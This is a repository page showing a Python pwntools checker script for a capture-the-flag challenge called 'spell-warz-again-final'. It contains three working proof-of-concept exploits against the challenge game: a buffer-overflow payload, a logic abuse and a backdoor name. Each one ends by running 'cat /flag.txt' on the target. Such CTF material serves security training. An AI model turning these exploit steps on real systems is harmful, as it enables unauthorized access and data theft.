myitinos
/
spell-warz-again-final
1
0
Fork 0
Code Issues 0 Pull Requests 0 Releases 0 Wiki Activity
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
9 Commits
1 Branch
456 KiB
Tree: bf30b72025
Branches Tags
${ item.name }
Create branch ${ searchTerm }
from 'bf30b72025'
${ noResults }
spell-warz-again-final/checker.py

104 lines
2.3 KiB
Raw Normal View History

update
4 years ago
update checker
4 years ago
update
4 years ago
update checker
4 years ago
update
4 years ago
update checker
4 years ago
update
4 years ago
update checker
4 years ago
update
4 years ago
update checker
4 years ago
update
4 years ago
update checker
4 years ago
update
4 years ago
 
  1. #! /usr/bin/env python2
  2. from pwn import process, remote
  3. 

  4. HOST = "192.168.2.20"
  5. TOTAL_TEAMS = 1
  6. FORMAT = "SlashRootCTF"
  7. 

  8. 

  9. def run():
  10.     # return process(FILENAME)
  11.     return remote("127.0.0.1", 60204)
  12. 

  13. 

  14. def poc0(host, port):
  15.     p = remote(host, port)
  16.     p.recvuntil(">")
  17.     p.sendline(("A" * 32) + ("\x11\x11\x11\x11\x11\x11\x11\x11\x01"))
  18.     msg = p.recvuntil(">")
  19.     # print(msg)
  20.     if "young" in msg:
  21.         p.sendline("y")
  22.         p.recvuntil(">")
  23.         p.sendline("2")
  24.         p.recvuntil(">")
  25.         p.sendline("4")
  26.         p.recvuntil(">")
  27.         p.sendline("y")
  28.         for _ in xrange(10):
  29.             p.recvuntil(">")
  30.             p.sendline("99")
  31.         p.sendline("cat /flag.txt")
  32.         flag = p.recvuntil("}")
  33.         # print flag
  34.         if FORMAT in flag:
  35.             return True
  36.         else:
  37.             return False
  38.     else:
  39.         return False
  40. 

  41. 

  42. def poc1(host, port):
  43.     p = remote(host, port)
  44.     p.recvuntil(">")
  45.     p.sendline("Leo")
  46.     p.recvuntil(">")
  47.     p.sendline("y")
  48.     for _ in range(2):
  49.         p.recvuntil(">")
  50.         p.sendline("3")
  51.         p.recvuntil(">")
  52.         p.sendline("0")
  53.         if "Who" in p.recvuntil(">"):
  54.             return False
  55.         p.sendline("y")
  56.         p.recvuntil(">")
  57.         p.sendline("1")
  58.     p.recvuntil(">")
  59.     p.sendline("4")
  60.     p.recvuntil(">")
  61.     p.sendline("y")
  62.     for _ in range(10):
  63.         p.recvuntil(">")
  64.         p.sendline("99")
  65.     p.sendline("cat /flag.txt")
  66.     flag = p.recvuntil("}")
  67.     if FORMAT in flag:
  68.         return True
  69.     else:
  70.         return False
  71. 

  72. 

  73. def poc2(host, port):
  74.     p = remote(host, port)
  75.     p.recvuntil(">")
  76.     p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
  77.     p.recvuntil(">")
  78.     p.sendline("y")
  79.     p.recvuntil(">")
  80.     p.sendline("6")
  81.     if "Lv: 1000000" in p.recvuntil(">"):
  82.         p.sendline("2")
  83.         p.recvuntil(">")
  84.         p.sendline("4")
  85.         p.recvuntil(">")
  86.         p.sendline("y")
  87.         for _ in xrange(10):
  88.             p.recvuntil(">")
  89.             p.sendline("99")
  90.         p.sendline("cat /flag.txt")
  91.         flag = p.recvuntil("}")
  92.         if FORMAT in flag:
  93.             return True
  94.         else:
  95.             return False
  96.     else:
  97.         return False
  98. 

  99. 

  100. if __name__ == "__main__":
  101.     for i in range(1, TOTAL_TEAMS+1):
  102.         print poc0(HOST, (60004 + (i*100)))
  103.         print poc1(HOST, (60004 + (i*100)))
  104.         print poc2(HOST, (60004 + (i*100)))